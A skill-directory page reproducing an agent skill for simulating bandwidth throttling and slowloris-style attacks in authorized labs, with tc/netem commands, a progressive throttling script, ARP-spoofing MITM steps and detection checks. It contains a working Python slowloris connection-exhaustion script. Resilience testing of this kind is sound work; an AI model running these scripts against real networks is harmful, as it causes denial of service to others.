Agent skill

Performing Bandwidth Throttling Attack Simulation

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Simulate bandwidth throttling and network degradation attacks using tc, iperf3, and Scapy in authorized lab environments to test QoS controls, application resilience, and monitoring detection of…

Apache-2.0Auto-check: notesBackend & APIs

Install Performing Bandwidth Throttling Attack Simulation

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-bandwidth-throttling-attack-simulation -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills performing-bandwidth-throttling-attack-simulation --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/performing-bandwidth-throttling-attack-simulation .claude/skills/performing-bandwidth-throttling-attack-simulation && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
performing-bandwidth-throttling-attack-simulation
GitHub stars
34k
Token cost
~3.1k tokens
SKILL.md length
623 words
Files
4 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Simulate bandwidth throttling and network degradation attacks using tc, iperf3, and Scapy in authorized lab environments to test QoS controls, application resilience, and monitoring detection of…

  • Works in 6 steps: Establish Baseline Bandwidth Measurements → Simulate Bandwidth Throttling with… → Simulate Progressive Degradation → …
  • Validating how VoIP
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder

What it does

Performing Bandwidth Throttling Attack Simulation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Simulate bandwidth throttling and network degradation attacks using tc, iperf3, and Scapy in authorized lab environments to test QoS controls, application resilience, and monitoring detection of traffic manipulation. Use when validating how VoIP, video, or other real-time applications and network monitoring tools respond to degraded bandwidth or slowloris-style throttling attacks.

Its SKILL.md is about 3.1k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Backend & APIs. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Validating how VoIP
  • Other real-time applications and network monitoring tools respond to degraded bandwidth
  • Slowloris-style throttling attacks

Example prompts

  • “/performing-bandwidth-throttling-attack-simulation”

Requirements

  • Python 3

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Establish Baseline Bandwidth Measurements
  2. Simulate Bandwidth Throttling with tc/netem
  3. Simulate Progressive Degradation
  4. Simulate Slowloris-Style Connection Exhaustion
  5. Measure Impact and Detect Anomalies
  6. Clean Up and Document

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Performing Bandwidth Throttling Attack Simulation loads about 3.1k tokens when it runs, and up to ~3.7k if it reads all its reference files. Until then it costs about 108 tokens; SKILL.md has 623 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~108
When it runs · the whole SKILL.md, loaded when a task matches
~3.1k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.7k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:88
    sudo tc qdisc add dev eth0 root tbf rate 1mbit burst 32kbit latency 50ms
  • NoteRuns commands with sudoSKILL.md:91
    sudo tc qdisc add dev eth0 root handle 1: htb default 10
  • NoteRuns commands with sudoSKILL.md:92
    sudo tc class add dev eth0 parent 1: classid 1:10 htb rate 1mbit ceil 2mbit
  • NoteRuns commands with sudoSKILL.md:95
    sudo tc qdisc add dev eth0 parent 1:10 handle 10: netem delay 200ms 50ms loss 5%
  • NoteRuns commands with sudoSKILL.md:98
    sudo tc qdisc add dev eth0 root handle 1: htb default 99
  • NoteRuns commands with sudoSKILL.md:99
    sudo tc class add dev eth0 parent 1: classid 1:1 htb rate 1000mbit
  • NoteRuns commands with sudoSKILL.md:100
    sudo tc class add dev eth0 parent 1:1 classid 1:10 htb rate 1mbit ceil 2mbit
  • NoteRuns commands with sudoSKILL.md:101
    sudo tc class add dev eth0 parent 1:1 classid 1:99 htb rate 1000mbit
  • NoteRuns commands with sudoSKILL.md:104
    sudo tc filter add dev eth0 parent 1: protocol ip prio 1 u32 \
  • NoteRuns commands with sudoSKILL.md:128
    sudo tc qdisc add dev $IFACE root tbf rate 50mbit burst 64kbit latency 50ms

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 623 words, ~3,132 tokens.

Download SKILL.mdSave it as .claude/skills/performing-bandwidth-throttling-attack-simulation/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
performing-bandwidth-throttling-attack-simulation
description
Simulate bandwidth throttling and network degradation attacks using tc, iperf3, and Scapy in authorized lab environments to test QoS controls, application resilience, and monitoring detection of traffic manipulation. Use when validating how VoIP, video, or other real-time applications and network monitoring tools respond to degraded bandwidth or slowloris-style throttling attacks.
domain
cybersecurity
subdomain
network-security
tags
network-security, bandwidth-throttling, qos, traffic-shaping, network-resilience
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.IR-01, DE.CM-01, ID.AM-03, PR.DS-02
mitre_attack
T1046, T1040, T1557, T1071

Performing Bandwidth Throttling Attack Simulation

When to Use

  • Testing application resilience to degraded network conditions during authorized security assessments
  • Validating QoS policies detect and mitigate unauthorized traffic shaping on the network
  • Simulating network slowloris-style attacks that degrade bandwidth rather than causing complete outages
  • Assessing the impact of bandwidth-based attacks on VoIP, video conferencing, and real-time applications
  • Testing network monitoring tools' ability to detect abnormal bandwidth utilization patterns

Do not use on production networks without authorization and a maintenance window, for causing denial-of-service conditions, or against critical infrastructure without safety controls.

Prerequisites

  • Written authorization for bandwidth manipulation testing
  • Linux system with tc (traffic control), netem, and iptables
  • iperf3 installed on both tester and target systems for bandwidth measurement
  • MITM position established (ARP spoofing) for traffic interception scenarios
  • Network monitoring tools deployed for detecting the simulation
  • Baseline bandwidth measurements before testing

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow

Step 1: Establish Baseline Bandwidth Measurements
bash
# Start iperf3 server on the target
iperf3 -s -p 5201

# Measure baseline bandwidth from the tester
iperf3 -c 10.10.20.10 -t 30 -P 4 -p 5201
# Record: bandwidth, jitter, packet loss

# Measure baseline latency
ping -c 100 10.10.20.10 | tail -1
# Record: min/avg/max/mdev

# Measure baseline jitter with UDP test
iperf3 -c 10.10.20.10 -u -b 100M -t 10 -p 5201
# Record: jitter and packet loss percentage

# Document baseline values
echo "Baseline: BW=$(iperf3 -c 10.10.20.10 -t 10 -f m | tail -1 | awk '{print $7}') Mbps" > baseline.txt
echo "Latency: $(ping -c 50 10.10.20.10 | tail -1)" >> baseline.txt
Step 2: Simulate Bandwidth Throttling with tc/netem
bash
# Add traffic control to limit bandwidth on the attacker's forwarding interface
# This simulates throttling traffic flowing through a compromised router

# Limit to 1 Mbps (severe throttling)
sudo tc qdisc add dev eth0 root tbf rate 1mbit burst 32kbit latency 50ms

# Or use hierarchical token bucket for more control
sudo tc qdisc add dev eth0 root handle 1: htb default 10
sudo tc class add dev eth0 parent 1: classid 1:10 htb rate 1mbit ceil 2mbit

# Add latency and packet loss to simulate degraded link
sudo tc qdisc add dev eth0 parent 1:10 handle 10: netem delay 200ms 50ms loss 5%

# Target specific traffic (only throttle traffic to specific host)
sudo tc qdisc add dev eth0 root handle 1: htb default 99
sudo tc class add dev eth0 parent 1: classid 1:1 htb rate 1000mbit
sudo tc class add dev eth0 parent 1:1 classid 1:10 htb rate 1mbit ceil 2mbit
sudo tc class add dev eth0 parent 1:1 classid 1:99 htb rate 1000mbit

# Filter: throttle only traffic to 10.10.20.10
sudo tc filter add dev eth0 parent 1: protocol ip prio 1 u32 \
  match ip dst 10.10.20.10/32 flowid 1:10

# Verify the qdisc configuration
tc -s qdisc show dev eth0
tc -s class show dev eth0
Step 3: Simulate Progressive Degradation
bash
#!/bin/bash
# Simulate progressive bandwidth degradation over time
# This mimics an attacker slowly throttling to avoid detection

IFACE="eth0"
TARGET="10.10.20.10"

# Phase 1: Baseline (no throttling) - 5 minutes
echo "[*] Phase 1: Baseline (no throttling)"
sleep 300

# Phase 2: Mild throttling (50% reduction)
echo "[*] Phase 2: Reducing to 50 Mbps"
sudo tc qdisc add dev $IFACE root tbf rate 50mbit burst 64kbit latency 50ms
sleep 300

# Phase 3: Moderate throttling (80% reduction)
echo "[*] Phase 3: Reducing to 10 Mbps"
sudo tc qdisc change dev $IFACE root tbf rate 10mbit burst 32kbit latency 50ms
sleep 300

# Phase 4: Severe throttling + latency + loss
echo "[*] Phase 4: Reducing to 1 Mbps + 200ms latency + 5% loss"
sudo tc qdisc del dev $IFACE root 2>/dev/null
sudo tc qdisc add dev $IFACE root handle 1: htb default 10
sudo tc class add dev $IFACE parent 1: classid 1:10 htb rate 1mbit ceil 2mbit
sudo tc qdisc add dev $IFACE parent 1:10 handle 10: netem delay 200ms 50ms loss 5%
sleep 300

# Phase 5: Recovery
echo "[*] Phase 5: Removing all throttling"
sudo tc qdisc del dev $IFACE root 2>/dev/null
echo "[*] Simulation complete"
Step 4: Simulate Slowloris-Style Connection Exhaustion
python
#!/usr/bin/env python3
"""Slowloris-style connection simulation for authorized bandwidth testing."""

import socket
import time
import threading

TARGET = "10.10.20.10"
PORT = 80
NUM_CONNECTIONS = 200

sockets = []

def create_slow_connection():
    """Create a connection that sends data very slowly."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(4)
        s.connect((TARGET, PORT))
        s.send(b"GET / HTTP/1.1\r\n")
        s.send(f"Host: {TARGET}\r\n".encode())
        sockets.append(s)
        return s
    except Exception:
        return None

def keep_alive():
    """Send partial headers to keep connections open."""
    while True:
        for s in list(sockets):
            try:
                s.send(b"X-Padding: " + b"A" * 10 + b"\r\n")
            except Exception:
                sockets.remove(s)
        time.sleep(15)

print(f"[*] Opening {NUM_CONNECTIONS} slow connections to {TARGET}:{PORT}")
for i in range(NUM_CONNECTIONS):
    s = create_slow_connection()
    if s:
        if (i + 1) % 50 == 0:
            print(f"[*] {i + 1} connections established")
    time.sleep(0.1)

print(f"[*] {len(sockets)} connections open. Sending keep-alive headers...")
print("[*] Press Ctrl+C to stop")

try:
    keep_alive()
except KeyboardInterrupt:
    print(f"\n[*] Closing {len(sockets)} connections")
    for s in sockets:
        try:
            s.close()
        except Exception:
            pass
    print("[*] Cleanup complete")
Step 5: Measure Impact and Detect Anomalies
bash
# Re-measure bandwidth during throttling
iperf3 -c 10.10.20.10 -t 10 -f m -p 5201
# Compare with baseline values

# Measure latency degradation
ping -c 50 10.10.20.10

# Check network monitoring for detection
# Verify that monitoring tools detected the bandwidth change

# Check SNMP-based monitoring (Cacti, LibreNMS, Zabbix)
# Interface utilization should show abnormal patterns

# Check Zeek logs for connection anomalies
cat /opt/zeek/logs/current/conn.log | \
  zeek-cut ts id.orig_h id.resp_h duration orig_bytes resp_bytes | \
  awk '$4 > 0 && ($5/$4 < 1000 || $6/$4 < 1000)' | head -20
# Low bytes/second ratio indicates throttling

# Check for QoS alerts in network management tools
# NetFlow analysis: look for changes in traffic patterns
# nfdump -r /var/cache/nfdump/nfcapd.* -s srcip/bytes -n 20
Step 6: Clean Up and Document
bash
# Remove all traffic control rules
sudo tc qdisc del dev eth0 root 2>/dev/null

# Verify cleanup
tc qdisc show dev eth0
# Should show: qdisc noqueue or default qdisc only

# Stop ARP spoofing if used
sudo killall arpspoof bettercap 2>/dev/null
sudo sysctl -w net.ipv4.ip_forward=0

# Final bandwidth measurement to confirm restoration
iperf3 -c 10.10.20.10 -t 10 -f m -p 5201

Key Concepts

TermDefinition
Traffic ShapingDeliberate manipulation of network traffic flow rates using queuing disciplines to control bandwidth allocation
tc (Traffic Control)Linux kernel subsystem for configuring packet scheduling, shaping, policing, and dropping using queuing disciplines (qdiscs)
netem (Network Emulator)Linux tc qdisc that simulates network conditions including delay, jitter, packet loss, corruption, and reordering
Token Bucket Filter (TBF)tc qdisc that limits traffic rate by allowing packets through only when tokens are available, enforcing a maximum bandwidth rate
SlowlorisApplication-layer attack that exhausts server connection pools by opening many connections and sending data very slowly
QoS (Quality of Service)Network mechanisms for prioritizing specific traffic types (VoIP, video) and ensuring minimum bandwidth guarantees

Tools & Systems

  • tc/netem: Linux kernel traffic control and network emulation framework for simulating bandwidth limitations and network degradation
  • iperf3: Network bandwidth measurement tool for establishing baselines and measuring the impact of throttling
  • Bettercap: Network attack framework used for establishing MITM position to intercept and throttle traffic
  • Scapy: Python packet manipulation for crafting custom traffic patterns and connection exhaustion simulations
  • NetFlow/sFlow: Network flow monitoring protocols for detecting abnormal bandwidth utilization patterns
Show full SKILL.md (226 more words)Show less

Common Scenarios

Scenario: Testing VoIP System Resilience to Bandwidth Degradation

Context: A company relies on SIP-based VoIP for business communications. The security team needs to assess how VoIP quality degrades under various network attack conditions and at what point calls become unusable. The testing is authorized on a dedicated VoIP test VLAN.

Approach:

  1. Establish baseline call quality using iperf3 UDP tests measuring jitter (<30ms) and packet loss (<1%) on the VoIP VLAN
  2. Set up MITM position between VoIP endpoints using ARP spoofing
  3. Progressively introduce latency (50ms, 100ms, 200ms, 500ms) using netem and measure MOS (Mean Opinion Score) at each level
  4. Introduce packet loss (1%, 3%, 5%, 10%) and measure call quality degradation
  5. Throttle bandwidth from 1 Mbps to 100 Kbps to determine the minimum usable bandwidth for G.711 codec (requires 87.2 Kbps)
  6. Verify that QoS policies on the network prioritize VoIP traffic and restore quality when throttling affects the shared link
  7. Document the degradation thresholds and recommend minimum QoS guarantees for the VoIP VLAN

Pitfalls:

  • Forgetting to remove tc rules after testing, leaving bandwidth limitations in place on the test network
  • Testing at rates too low, causing complete call failure instead of measurable degradation
  • Not accounting for VoIP codec differences -- G.711 requires more bandwidth than G.729
  • Running the test on a shared VLAN and affecting non-test traffic

Output Format

## Bandwidth Throttling Simulation Report

**Test ID**: BW-THROTTLE-2024-001
**Target Network**: VLAN 60 (VoIP Test)
**Test Duration**: 2024-03-15 14:00-16:00 UTC

### Baseline Measurements
| Metric | Value |
|--------|-------|
| Bandwidth (TCP) | 947 Mbps |
| Bandwidth (UDP) | 912 Mbps |
| Latency (avg) | 0.8 ms |
| Jitter | 0.2 ms |
| Packet Loss | 0.00% |

### Degradation Impact Matrix

| Condition | Bandwidth | Latency | Jitter | Loss | VoIP MOS |
|-----------|-----------|---------|--------|------|----------|
| Baseline | 947 Mbps | 0.8 ms | 0.2 ms | 0% | 4.4 |
| 50ms latency | 947 Mbps | 51 ms | 5 ms | 0% | 4.0 |
| 200ms latency | 947 Mbps | 201 ms | 25 ms | 0% | 3.2 |
| 5% loss | 947 Mbps | 0.8 ms | 0.2 ms | 5% | 2.8 |
| 1 Mbps cap | 1 Mbps | 45 ms | 12 ms | 2% | 3.0 |
| 100 Kbps cap | 100 Kbps | 380 ms | 95 ms | 15% | 1.2 |

### QoS Validation
- QoS detected throttling at 10 Mbps threshold: YES
- VoIP traffic prioritized during throttling: YES (maintained 3.8 MOS)
- Alert generated by monitoring: YES (bandwidth anomaly at 14:15 UTC)

### Recommendations
1. Ensure minimum 200 Kbps guaranteed bandwidth per VoIP call
2. Configure QoS to prioritize DSCP EF (46) marked traffic
3. Set monitoring threshold at 80% bandwidth utilization for early warning

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/performing-bandwidth-throttling-attack-simulation of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Performing Bandwidth Throttling Attack Simulation next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Performing Bandwidth Throttling Attack Simulation compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Performing Bandwidth Throttling Attack Simulation this skillmukul975/Anthropic-Cybersecurity-Skills34k—~3.1kAutomated safety check: NotesApache-2.0
Test Web Cache Behaviorcyberful/cyberful135—~631Automated safety check: PassAGPL-3.0
Lokalise Security Basicsjeremylongshore/tons-of-skills-marketplace2.8k—~2.4kAutomated safety check: NotesMIT
Common Security StandardsHoangNguyen0403/agent-skills-standard571—~764Automated safety check: PassMIT
Mintlify APImacro-inc/macro4.6k2 repos~333Automated safety check: PassMIT
Security Reviewdoorkeeper-gem/doorkeeper5.5k—~1.4kAutomated safety check: PassMIT

Similar skills

  • Test Web Cache Behavior

    cyberful/cyberful

    Test authorized web-cache key construction, variation, partitioning, authenticated response handling, revalidation, poisoning, deception, purge, and TTL behavior.

    135 GitHub stars~631 tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed
  • Lokalise Security Basics

    jeremylongshore/tons-of-skills-marketplace

    Apply Lokalise security best practices for API tokens and access control.

    2.8k GitHub stars~2.4k tokensUpdated today
    Backend & APIsAuto-check: notes
  • Common Security Standards

    HoangNguyen0403/agent-skills-standard

    Enforce universal security protocols for safe, resilient software.

    571 GitHub stars~764 tokensUpdated today
    Backend & APIsAuto-check passed
  • Mintlify API

    macro-inc/macro

    Interact with the Mintlify REST API to manage deployments, trigger builds, and query documentation site metadata programmatically.

    4.6k GitHub starsUsed in 2 repos~333 tokens
    Backend & APIsAuto-check passed
  • Security Review

    doorkeeper-gem/doorkeeper

    Verify that code changes do not introduce OAuth security vulnerabilities.

    5.5k GitHub stars~1.4k tokensUpdated 2 days ago
    Backend & APIsAuto-check passed
  • Rtvi Vlm Perf Testing

    NVIDIA-AI-Blueprints/video-search-and-summarization

    Plan, run, and diagnose reproducible RT-VLM GPU performance canaries and benchmarks.

    1.9k GitHub stars~8.6k tokensUpdated today
    Backend & APIsAuto-check: notes

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Questions about Performing Bandwidth Throttling Attack Simulation

What does Performing Bandwidth Throttling Attack Simulation do?

Simulate bandwidth throttling and network degradation attacks using tc, iperf3, and Scapy in authorized lab environments to test QoS controls, application resilience, and monitoring detection of…. Performing Bandwidth Throttling Attack Simulation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Simulate bandwidth throttling and network degradation attacks using tc, iperf3, and Scapy in authorized lab environments to test QoS controls, application resilience, and monitoring detection of traffic manipulation.

When should I use Performing Bandwidth Throttling Attack Simulation?

Performing Bandwidth Throttling Attack Simulation fits situations like: validating how VoIP; other real-time applications and network monitoring tools respond to degraded bandwidth; slowloris-style throttling attacks.

How do I install Performing Bandwidth Throttling Attack Simulation in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-bandwidth-throttling-attack-simulation -a claude-code`. Or copy the skill folder (skills/performing-bandwidth-throttling-attack-simulation in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/performing-bandwidth-throttling-attack-simulation in your project. Claude Code loads it when a task matches its description.

How do I install Performing Bandwidth Throttling Attack Simulation in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-bandwidth-throttling-attack-simulation -a codex`. Or copy the skill folder (skills/performing-bandwidth-throttling-attack-simulation in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/performing-bandwidth-throttling-attack-simulation in your project. Codex loads it when a task matches its description.

Can I use Performing Bandwidth Throttling Attack Simulation in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-bandwidth-throttling-attack-simulation -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/performing-bandwidth-throttling-attack-simulation, .gemini/skills/performing-bandwidth-throttling-attack-simulation, .github/skills/performing-bandwidth-throttling-attack-simulation and .opencode/skills/performing-bandwidth-throttling-attack-simulation in your project.

What does Performing Bandwidth Throttling Attack Simulation need to run?

Going by SKILL.md and its folder, Performing Bandwidth Throttling Attack Simulation needs Python for the scripts in its folder. Our summary lists: Python 3.

Does Performing Bandwidth Throttling Attack Simulation access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Performing Bandwidth Throttling Attack Simulation safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Performing Bandwidth Throttling Attack Simulation use?

Performing Bandwidth Throttling Attack Simulation is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Performing Bandwidth Throttling Attack Simulation use?

About 3.1k tokens (SKILL.md is roughly 13k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 558 tokens, read only when the agent opens those files.

What are the alternatives to Performing Bandwidth Throttling Attack Simulation?

Skills that share tags, products or a category with Performing Bandwidth Throttling Attack Simulation: Test Web Cache Behavior (cyberful/cyberful, 135 stars), Lokalise Security Basics (jeremylongshore/tons-of-skills-marketplace, 2.8k stars), Common Security Standards (HoangNguyen0403/agent-skills-standard, 571 stars) and Mintlify API (macro-inc/macro, 4.6k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Performing Bandwidth Throttling Attack Simulation?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,993 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.